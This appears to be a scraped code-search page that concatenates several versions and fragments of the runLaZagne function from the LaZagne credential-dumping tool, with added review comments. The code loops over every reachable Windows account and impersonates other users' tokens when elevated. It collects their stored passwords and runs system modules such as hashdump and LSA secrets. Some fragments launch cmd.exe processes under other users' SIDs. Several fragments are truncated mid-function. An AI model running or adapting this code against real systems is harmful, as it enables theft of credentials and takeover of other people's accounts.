def runLaZagne(category_choosed='all'):
    """Run the chosen module category against every user this process can reach.

    Generator: for each user it yields a ``('User', name)`` marker, then
    re-yields everything ``runModule()`` produces for that user.  After each
    user the module-level ``constant.finalResults`` dict is appended to the
    module-level ``stdoutRes`` list, so results are both streamed and collected.

    Passes, in order:
      1. the account the process runs as (skipped when the name ends in '$');
      2. when the process is elevated, other accounts reached through token
         impersonation (``ListSids()`` / ``impersonate_sid_long_handle()``);
      3. when elevated, the remaining accounts found on the file system, run
         without a token -- only ``set_env_variables()`` is called for them.

    :param category_choosed: forwarded unchanged to every ``runModule()`` call.
    """

    # ------ Part used for user impersonation ------

    # Encoded once so the name can be printed and compared with the
    # account names taken from ListSids() below.
    current_user = getpass.getuser().encode('utf-8', errors='ignore')
    # Names ending in '$' are skipped -- presumably machine accounts; confirm.
    if not current_user.endswith('$'):
        constant.finalResults = {'User': current_user}
        print '\n\n########## User: %s ##########\n' % current_user
        yield 'User', current_user
        set_env_variables()
        for r in runModule(category_choosed):
            yield r
        stdoutRes.append(constant.finalResults)

    # Check if admin to impersonate: IsUserAnAdmin() is non-zero when the
    # caller runs with administrative rights.
    if ctypes.windll.shell32.IsUserAnAdmin() != 0:
        # --------- Impersonation using tokens ---------

        # ListSids() rows are indexed below as [2] = SID string and
        # [3] = 'DOMAIN\account'.
        sids = ListSids()
        # account name -> list of SIDs seen for that account
        impersonateUsers = {}
        # Names already handled; handed to get_user_list_on_filesystem()
        # later, presumably so the file-system pass can exclude them.
        impersonated_user = [current_user]
        for sid in sids:
            # Not save the current user's SIDs
            if current_user != sid[3].split('\\', 1)[1]:
                impersonateUsers.setdefault(sid[3].split('\\', 1)[1],
                                            []).append(sid[2])

        for user in impersonateUsers:
            # Skip accounts whose name contains 'service' as a separate word.
            if 'service ' in user.lower() or ' service' in user.lower():
                continue

            print '\n\n########## User: %s ##########\n' % user.encode(
                'utf-8', errors='ignore')
            yield 'User', user

            constant.finalResults = {'User': user}
            # Try each SID recorded for this account; stop at the first that works.
            for sid in impersonateUsers[user]:
                try:
                    set_env_variables(user, toImpersonate=True)
                    # A falsy return means impersonation failed -> next SID.
                    if not impersonate_sid_long_handle(sid, close=False):
                        continue
                    # time.sleep(3)

                    _cannot_be_impersonate_using_tokens = False
                    _need_system_privileges = False

                    # S-1-5-18 is the well-known LOCAL SYSTEM SID.
                    # NOTE(review): the flag names read inverted relative to
                    # the outcome -- a successful non-SYSTEM impersonation sets
                    # cannot_be_impersonate_using_tokens=True.  Kept as is;
                    # check how runModule() interprets these two flags.
                    if sid == "S-1-5-18":
                        _need_system_privileges = True
                    else:
                        impersonated_user.append(user)
                        _cannot_be_impersonate_using_tokens = True

                    # Launch module wanted
                    for r in runModule(
                            category_choosed,
                            need_system_privileges=_need_system_privileges,
                            cannot_be_impersonate_using_tokens=
                            _cannot_be_impersonate_using_tokens):
                        yield r

                    # Revert the impersonation and record this user's results.
                    rev2self()
                    stdoutRes.append(constant.finalResults)
                    break
                except Exception, e:
                    # Any failure is printed and swallowed.  NOTE(review): if
                    # runModule() raised, rev2self() above did not run, so the
                    # next SID is attempted without the previous impersonation
                    # having been reverted here.
                    print e
                    pass

        # --------- Impersonation browsing file system

        # Ready to check for all users remaining: the names already handled
        # above are passed in, presumably to be excluded from the result.
        all_users = get_user_list_on_filesystem(impersonated_user)
        for user in all_users:
            # No token is acquired here; only the environment is switched.
            set_env_variables(user, toImpersonate=True)
            print_debug(
                'INFO', '[!] Trying to impersonate user: %s' %
                user.encode('utf-8', errors='ignore'))
            print '\n\n########## User: %s ##########\n' % user.encode(
                'utf-8', errors='ignore')

            # Fix value by default for user environment (appdata and userprofile)
            constant.finalResults = {'User': user}
            yield 'User', user

            # Retrieve passwords that need high privileges.
            # not_need_to_be_in_env presumably tells runModule() this pass runs
            # without a token; confirm in runModule().
            for r in runModule(category_choosed, not_need_to_be_in_env=True):
                yield r

            stdoutRes.append(constant.finalResults)
def runLaZagne(category_choosed='all'):
	"""Run the chosen module category against every user this process can reach.

	Generator: yields a ``('User', name)`` marker before each user's results in
	the first two passes, then re-yields whatever ``runModule()`` produces.
	After each user the module-level ``constant.finalResults`` dict is appended
	to the module-level ``stdoutRes`` list.

	Passes, in order:
	  1. the account the process runs as (skipped when the name ends in '$');
	  2. when the process is elevated, other accounts reached through token
	     impersonation (``ListSids()`` / ``impersonate_sid_long_handle()``);
	  3. when elevated, the remaining accounts found on the file system, run
	     without a token -- only ``set_env_variables()`` is called.  NOTE: this
	     pass does not yield the ``('User', name)`` marker the other two do.

	:param category_choosed: forwarded unchanged to every ``runModule()`` call.
	"""

	# ------ Part used for user impersonation ------

	# Encoded once so the name can be compared with the account names
	# taken from ListSids() below.
	current_user = getpass.getuser().encode('utf-8', errors='ignore')
	# Names ending in '$' are skipped -- presumably machine accounts; confirm.
	if not current_user.endswith('$'):
		constant.finalResults = {'User': current_user}
		print_user(current_user)
		yield 'User', current_user
		set_env_variables()
		for r in runModule(category_choosed):
			yield r
		stdoutRes.append(constant.finalResults)

	# Check if admin to impersonate: IsUserAnAdmin() is non-zero when the
	# caller runs with administrative rights.
	if ctypes.windll.shell32.IsUserAnAdmin() != 0:
		# --------- Impersonation using tokens ---------
		
		# ListSids() rows are indexed below as [2] = SID string and
		# [3] = 'DOMAIN\account'.
		sids = ListSids()
		# account name -> list of SIDs seen for that account
		impersonateUsers = {}
		# Names already handled; handed to get_user_list_on_filesystem()
		# later, presumably so the file-system pass can exclude them.
		impersonated_user = [current_user]
		for sid in sids:
			# Not save the current user's SIDs
			if current_user != sid[3].split('\\', 1)[1]:
				impersonateUsers.setdefault(sid[3].split('\\', 1)[1], []).append(sid[2])
				
		for user in impersonateUsers:
			# Skip accounts whose name contains 'service' as a separate word.
			if 'service ' in user.lower() or ' service' in user.lower():
				continue
			
			print_user(user)
			yield 'User', user

			constant.finalResults = {'User': user}
			# Try each SID recorded for this account; stop at the first that
			# completes without raising.
			for sid in impersonateUsers[user]:
				try:
					set_env_variables(user, toImpersonate=True)
					# NOTE(review): the return value is not checked here, so a
					# failed impersonation is only noticed if it raises.
					impersonate_sid_long_handle(sid, close=False)

					_cannot_be_impersonate_using_tokens = False
					_need_system_privileges = False
					
					# S-1-5-18 is the well-known LOCAL SYSTEM SID.
					# NOTE(review): the flag names read inverted relative to the
					# outcome -- a non-SYSTEM impersonation sets
					# cannot_be_impersonate_using_tokens=True.  Kept as is; check
					# how runModule() interprets these two flags.
					if sid == "S-1-5-18":
						_need_system_privileges = True
					else:
						impersonated_user.append(user)
						_cannot_be_impersonate_using_tokens = True
					
					# Launch module wanted
					for r in runModule(category_choosed, need_system_privileges=_need_system_privileges, cannot_be_impersonate_using_tokens=_cannot_be_impersonate_using_tokens):
						yield r
					
					# Revert the impersonation and record this user's results.
					rev2self()
					stdoutRes.append(constant.finalResults)
					break
				except Exception, e:
					# Any failure is printed and swallowed.  NOTE(review): if
					# runModule() raised, rev2self() above did not run before the
					# next SID is attempted.
					print e
					pass

		# --------- Impersonation browsing file system

		# Ready to check for all users remaining: the names already handled
		# above are passed in, presumably to be excluded from the result.
		all_users = get_user_list_on_filesystem(impersonated_user)
		for user in all_users:
			# No token is acquired here; only the environment is switched.
			set_env_variables(user, toImpersonate = True)
			print_user(user)
			
			# Fix value by default for user environment (appdata and userprofile)
			constant.finalResults = {'User': user}
		
			# Retrieve passwords that need high privileges.
			# not_need_to_be_in_env presumably tells runModule() this pass runs
			# without a token; confirm in runModule().
			for r in runModule(category_choosed, not_need_to_be_in_env=True):
				yield r
			
			stdoutRes.append(constant.finalResults)
def runLaZagne(category_choosed='all', password=None):
    """Run the chosen module category against every user this process can reach.

    Generator: for each user it yields a ``('User', name)`` marker, then
    re-yields everything ``runModule()`` produces for that user.  After each
    user the module-level ``constant.finalResults`` dict is appended to the
    module-level ``stdoutRes`` list.  ``constant.username`` is updated to the
    account currently being processed.

    Passes, in order:
      1. the account the process runs as (skipped when the name ends in '$');
      2. when the process is elevated, other accounts reached through token
         impersonation -- the LOCAL SYSTEM SID is excluded from this pass;
      3. when elevated, the remaining accounts found on the file system, run
         without a token (``set_env_variables()`` only);
      4. when elevated, the system-wide modules, reported under the
         placeholder user name '******'.

    :param category_choosed: forwarded unchanged to every ``runModule()`` call.
    :param password: when truthy, stored in ``constant.user_password`` before
        any module runs.
    """

    # useful if this function is called from another tool
    if password:
        constant.user_password = password

    # ------ Part used for user impersonation ------

    constant.username = getpass.getuser()
    # Names ending in '$' are skipped -- presumably machine accounts; confirm.
    if not constant.username.endswith('$'):
        constant.finalResults = {'User': constant.username}
        print_user(constant.username)
        yield 'User', constant.username

        set_env_variables(user=constant.username)

        for r in runModule(category_choosed):
            yield r
        stdoutRes.append(constant.finalResults)

    # Check if admin to impersonate: IsUserAnAdmin() is non-zero when the
    # caller runs with administrative rights.
    if ctypes.windll.shell32.IsUserAnAdmin() != 0:

        # --------- Impersonation using tokens ---------

        # ListSids() rows are indexed below as [2] = SID string and
        # [3] = 'DOMAIN\account'.
        sids = ListSids()
        # account name -> list of SIDs seen for that account
        impersonateUsers = {}
        # Names already handled; handed to get_user_list_on_filesystem()
        # later, presumably so the file-system pass can exclude them.
        impersonated_user = [constant.username]

        for sid in sids:
            # Not save the current user's SIDs and not impersonate system user
            # (S-1-5-18 is the well-known LOCAL SYSTEM SID; system modules
            # are run separately at the end).
            if constant.username != sid[3].split(
                    '\\', 1)[1] and sid[2] != 'S-1-5-18':
                impersonateUsers.setdefault(sid[3].split('\\', 1)[1],
                                            []).append(sid[2])

        for user in impersonateUsers:
            # Skip any account whose name contains 'service' anywhere.
            if 'service' in user.lower().strip():
                continue

            print_user(user)
            yield 'User', user

            constant.finalResults = {'User': user}
            # Try each SID recorded for this account; stop at the first that
            # completes without raising.
            for sid in impersonateUsers[user]:
                try:
                    set_env_variables(user, toImpersonate=True)
                    # NOTE(review): the return value is not checked, so a failed
                    # impersonation is only noticed if it raises; the user is
                    # recorded as impersonated regardless.
                    impersonate_sid_long_handle(sid, close=False)
                    impersonated_user.append(user)

                    # Launch module wanted
                    for r in runModule(category_choosed, registry_used=False):
                        yield r

                    # Revert the impersonation and record this user's results.
                    rev2self()
                    stdoutRes.append(constant.finalResults)
                    break
                except Exception, e:
                    # Any failure is printed and swallowed.  NOTE(review): if
                    # runModule() raised, rev2self() above did not run before
                    # the next SID is attempted.
                    print e

        # --------- Impersonation browsing file system ---------

        # Ready to check for all users remaining: the names already handled
        # above are passed in, presumably to be excluded from the result.
        all_users = get_user_list_on_filesystem(impersonated_user)
        for user in all_users:
            # Fix value by default for user environment (appdata and userprofile).
            # No token is acquired here; only the environment is switched.
            set_env_variables(user, toImpersonate=True)
            print_user(user)

            constant.username = user
            constant.finalResults = {'User': user}
            yield 'User', user

            # Retrieve passwords that need high privileges
            for r in runModule(category_choosed,
                               dpapi_used=False,
                               registry_used=False):
                yield r

            stdoutRes.append(constant.finalResults)

        # --------- Execute System modules ---------
        # System modules (hashdump, lsa secrets, etc.)
        # '******' is the placeholder 'User' label for system-wide results.
        constant.username = '******'
        constant.finalResults = {'User': constant.username}

        # Header printed through constant.st here (not the module-level
        # print_user used above) and only when INFO logging is enabled.
        if logging.getLogger().isEnabledFor(logging.INFO):
            constant.st.print_user(constant.username)
        yield 'User', constant.username
        for r in runModule(category_choosed,
                           system_module=True,
                           dpapi_used=False):
            yield r

        stdoutRes.append(constant.finalResults)
                for sid in impersonateUsers[users]:
                    try:
                        pid = int(
                            create_proc_as_sid(
                                sid, "cmd.exe /c %s %s" % (dst, argv)))

                        # Wait for the child process to end and keep the output into the stdoutRes variable
                        stdoutRes.append(childOutput(pid, tmpFile, True))

                        # Store user when the impersonation succeed
                        try:
                            impersonated_user.append(users.split('\\')[1])
                        except:
                            pass

                        rev2self()
                        break
                    except Exception, e:
                        print_debug('ERROR', e)
                        pass
        except (KeyboardInterrupt, SystemExit):
            print_debug('INFO', 'Keyboard interrupt. Cleaning Up')
            try:
                print_debug('INFO', '[!] Killing child process')
                p = psutil.Process(pid)
                p.kill()
                print_debug('INFO', '[+] Child process killed')
            except:
                pass

            cleanFileSystem(tmpFile)
def runLaZagne():
    """Run the selected module category for the current user and, when
    elevated, for other accounts reachable through token impersonation.

    Generator.  ``category_choosed`` is not a parameter here: it must be
    resolvable from an enclosing or module scope.  For the current user this
    yields a ``('User', name)`` marker, re-yields each ``runModule()`` result
    and also accumulates ``str(result)`` lines into the module-level ``creds``
    string.  For impersonated users the ``runModule()`` output is consumed
    without being yielded, and ``stdoutRes`` is not appended for them (only
    ``constant.finalResults`` is reset per user -- whether runModule() fills
    it is not visible here).
    """

    # ------ Part used for user impersonation ------

    # Encoded once so the name can be printed and compared with the
    # account names taken from ListSids() below.
    current_user = getpass.getuser().encode('utf-8', errors='ignore')
    # Names ending in '$' are skipped -- presumably machine accounts; confirm.
    if not current_user.endswith('$'):
        constant.finalResults = {'User': current_user}
        print '\n\n########## User: %s ##########\n' % current_user
        set_env_variables()
        # Reset the module-level text accumulator for this run.
        global creds
        creds = ''
        for r in runModule(category_choosed):
            yield r
            creds += str(r) + "\n"

        stdoutRes.append(constant.finalResults)

    # Check if admin to impersonate: IsUserAnAdmin() is non-zero when the
    # caller runs with administrative rights.
    if ctypes.windll.shell32.IsUserAnAdmin() != 0:

        # --------- Impersonation using tokens ---------

        # ListSids() rows are indexed below as [2] = SID string and
        # [3] = 'DOMAIN\account'.
        sids = ListSids()
        # account name -> list of SIDs seen for that account
        impersonateUsers = {}
        # Names already handled (appended to but not read again in this version).
        impersonated_user = [current_user]
        for sid in sids:
            # Not save the current user's SIDs
            if current_user != sid[3].split('\\', 1)[1]:
                impersonateUsers.setdefault(sid[3].split('\\', 1)[1],
                                            []).append(sid[2])

        for user in impersonateUsers:
            # Skip accounts whose name contains 'service' as a separate word.
            if 'service ' in user.lower() or ' service' in user.lower():
                continue

            # NOTE(review): no ('User', name) marker is yielded for
            # impersonated users, unlike the current-user pass above.
            print '\n\n########## User: %s ##########\n' % user.encode(
                'utf-8', errors='ignore')
            constant.finalResults = {'User': user}
            # Try each SID recorded for this account; stop at the first that works.
            for sid in impersonateUsers[user]:
                try:
                    set_env_variables(user, toImpersonate=True)
                    # A falsy return means impersonation failed -> next SID.
                    if not impersonate_sid_long_handle(sid, close=False):
                        continue
                    # time.sleep(3)

                    _cannot_be_impersonate_using_tokens = False
                    _need_system_privileges = False

                    # S-1-5-18 is the well-known LOCAL SYSTEM SID.
                    # NOTE(review): the flag names read inverted relative to
                    # the outcome -- a successful non-SYSTEM impersonation sets
                    # cannot_be_impersonate_using_tokens=True.  Kept as is;
                    # check how runModule() interprets these two flags.
                    if sid == "S-1-5-18":
                        _need_system_privileges = True
                    else:
                        impersonated_user.append(user)
                        _cannot_be_impersonate_using_tokens = True

                    # Launch module wanted.  Results are drained but not
                    # yielded or appended to stdoutRes in this version.
                    for r in runModule(
                            category_choosed,
                            need_system_privileges=_need_system_privileges,
                            cannot_be_impersonate_using_tokens=
                            _cannot_be_impersonate_using_tokens):
                        pass

                    # Revert the impersonation; stop at the first SID that worked.
                    rev2self()
                    break
                except Exception, e:
                    # Any failure is printed and swallowed.  NOTE(review): if
                    # runModule() raised, rev2self() above did not run before
                    # the next SID is attempted.
                    print e
                    pass
文件: laZagne.py 项目: xl7dev/LaZagne
            for users in impersonateUsers.keys():
                print_debug("INFO", "[!] Impersonate token user of %s" % users.encode("utf-8"))
                for sid in impersonateUsers[users]:
                    try:
                        pid = int(create_proc_as_sid(sid, "cmd.exe /c %s %s" % (dst, argv)))

                        # Wait for the child process to end and keep the output into the stdoutRes variable
                        stdoutRes.append(childOutput(pid, tmpFile, True))

                        # Store user when the impersonation succeed
                        try:
                            impersonated_user.append(users.split("\\")[1])
                        except:
                            pass

                        rev2self()
                        break
                    except Exception, e:
                        print_debug("ERROR", e)
                        pass
        except (KeyboardInterrupt, SystemExit):
            print_debug("INFO", "Keyboard interrupt. Cleaning Up")
            try:
                print_debug("INFO", "[!] Killing child process")
                p = psutil.Process(pid)
                p.kill()
                print_debug("INFO", "[+] Child process killed")
            except:
                pass

            cleanFileSystem(tmpFile)